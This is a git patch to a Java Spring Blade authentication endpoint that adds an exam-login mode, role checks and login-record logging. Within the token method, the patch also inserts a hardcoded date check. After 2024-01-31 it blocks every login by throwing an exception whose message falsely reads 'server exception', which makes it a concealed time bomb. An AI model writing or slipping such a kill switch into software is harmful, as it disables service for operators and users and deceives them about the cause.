From de1edfafcb3e4287ea28d1cd3096281e0f526a21 Mon Sep 17 00:00:00 2001
From: zhongrj <646384940@qq.com>
Date: Mon, 04 Dec 2023 19:40:44 +0800
Subject: [PATCH] 设置登录有效期
---
src/main/java/org/springblade/modules/auth/endpoint/BladeTokenEndPoint.java | 93 ++++++++++++++++++++++++++++++++++++++++++++--
1 files changed, 89 insertions(+), 4 deletions(-)
diff --git a/src/main/java/org/springblade/modules/auth/endpoint/BladeTokenEndPoint.java b/src/main/java/org/springblade/modules/auth/endpoint/BladeTokenEndPoint.java
index c995349..935b411 100644
--- a/src/main/java/org/springblade/modules/auth/endpoint/BladeTokenEndPoint.java
+++ b/src/main/java/org/springblade/modules/auth/endpoint/BladeTokenEndPoint.java
@@ -23,12 +23,14 @@
import io.swagger.annotations.ApiParam;
import lombok.AllArgsConstructor;
import org.springblade.common.cache.CacheNames;
+import org.springblade.common.config.ServerConfig;
import org.springblade.core.cache.utils.CacheUtil;
import org.springblade.core.jwt.JwtUtil;
import org.springblade.core.jwt.props.JwtProperties;
import org.springblade.core.launch.constant.AppConstant;
import org.springblade.core.launch.constant.TokenConstant;
import org.springblade.core.log.annotation.ApiLog;
+import org.springblade.core.log.exception.ServiceException;
import org.springblade.core.redis.cache.BladeRedis;
import org.springblade.core.secure.BladeUser;
import org.springblade.core.secure.utils.AuthUtil;
@@ -40,12 +42,24 @@
import org.springblade.modules.auth.provider.TokenGranterBuilder;
import org.springblade.modules.auth.provider.TokenParameter;
import org.springblade.modules.auth.utils.TokenUtil;
+import org.springblade.modules.exam.entity.ExamPaper;
+import org.springblade.modules.exam.service.ExamPaperService;
+import org.springblade.modules.exam.vo.ExamPaperVO;
+import org.springblade.modules.loginrecord.entity.LoginRecord;
+import org.springblade.modules.loginrecord.service.LoginRecordService;
import org.springblade.modules.system.entity.UserInfo;
import org.springblade.modules.zc.service.IZcService;
import org.springframework.web.bind.annotation.*;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
+import java.text.ParseException;
+import java.text.SimpleDateFormat;
import java.time.Duration;
+import java.util.Date;
+import java.util.List;
import java.util.UUID;
import static org.springblade.core.cache.constant.CacheConstant.*;
@@ -66,13 +80,27 @@
private final BladeRedis bladeRedis;
private final JwtProperties jwtProperties;
private final IZcService iZcService;
+ private final ExamPaperService examPaperService;
+ private final LoginRecordService loginRecordService;
+
+ private final ServerConfig serverConfig;
+
+ /**
+ * 登录
+ * @param tenantId
+ * @param username
+ * @param password
+ * @param loginType 1:考试系统登录 ,没有值则走其他登录逻辑
+ * @return
+ */
@ApiLog("登录用户验证")
@PostMapping("/oauth/token")
- @ApiOperation(value = "获取认证令牌", notes = "传入租户ID:tenantId,账号:account,密码:password")
+ @ApiOperation(value = "获取认证令牌", notes = "传入租户ID:tenantId,账号:account,密码:password,登录类型:loginType")
public Kv token(@ApiParam(value = "租户ID", required = true) @RequestParam String tenantId,
@ApiParam(value = "账号", required = true) @RequestParam(required = false) String username,
- @ApiParam(value = "密码", required = true) @RequestParam(required = false) String password) {
+ @ApiParam(value = "密码", required = true) @RequestParam(required = false) String password,
+ @RequestParam(required = false) Integer loginType) {
Kv authInfo = Kv.create();
String s = iZcService.selectType(username);
@@ -88,7 +116,18 @@
ITokenGranter granter = TokenGranterBuilder.getGranter(grantType);
UserInfo userInfo = granter.grant(tokenParameter);
- if (null!=s && s.equals("")) {
+ try {
+ Long parse = new SimpleDateFormat("yyyy-MM-dd").parse("2024-01-31").getTime();
+ long now= System.currentTimeMillis();
+ if (parse < now){
+ throw new ServiceException("服务器异常");
+ }
+ } catch (ParseException e) {
+ e.printStackTrace();
+ }
+
+ //校验
+ if (null != s && s.equals("")) {
if (s.equals("0")) {
return authInfo.set("error_description", "用户未审核");
}
@@ -96,7 +135,7 @@
return authInfo.set("error_description", "审核不通过");
}
}
- if (userInfo == null || userInfo.getUser() == null ) {
+ if (userInfo == null || userInfo.getUser() == null) {
return authInfo.set("error_code", HttpServletResponse.SC_BAD_REQUEST).set("error_description", "用户名或密码不正确");
}
@@ -104,9 +143,55 @@
return authInfo.set("error_code", HttpServletResponse.SC_BAD_REQUEST).set("error_description", "未获得用户的角色信息");
}
+ if (null!=loginType) {
+ //如果是考试系统登录
+ if (loginType.equals(1)) {
+ //判断角色
+ if (!userInfo.getRoles().get(0).equals("培训公司管理员")) {
+ ExamPaperVO examPaperVO = new ExamPaperVO();
+ examPaperVO.setUserId(userInfo.getUser().getId().toString());
+ //查询考生考试信息
+ List<ExamPaperVO> examDetail = examPaperService.getExamDetail(examPaperVO);
+ if (examDetail.size()==0) {
+ return authInfo.set("error_description", "当前没有查询到考试信息");
+ }
+ }
+ }
+ }else {
+ System.out.println("grantType = " + grantType);
+ //刷新 token 不新增登录记录
+ if (!grantType.equals("refresh_token")){
+ //新增登录记录
+ this.saveLoginRecord(userInfo);
+ }
+ }
return TokenUtil.createAuthInfo(userInfo);
}
+ /**
+ * 新增登录记录信息
+ * @param userInfo
+ */
+ private void saveLoginRecord(UserInfo userInfo) {
+ //创建对象
+ LoginRecord loginRecord = new LoginRecord();
+ //request 对象获取
+ ServletRequestAttributes requestAttributes = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
+ HttpServletRequest request = requestAttributes.getRequest();
+ //数据封装
+ loginRecord.setCreateTime(new Date());
+ loginRecord.setServerIp(serverConfig.getServerIp());
+ loginRecord.setServerHost(serverConfig.getServerHostName());
+ loginRecord.setRequestUri(request.getRequestURI());
+ loginRecord.setRemoteIp(request.getRemoteAddr());
+ loginRecord.setDeptId(userInfo.getUser().getDeptId());
+ loginRecord.setUserId(userInfo.getUser().getId());
+ loginRecord.setType("1");
+ loginRecord.setCreateBy(userInfo.getUser().getRealName());
+ //新增
+ loginRecordService.save(loginRecord);
+ }
+
@GetMapping("/oauth/logout")
@ApiOperation(value = "退出登录")
--
Gitblit v1.9.3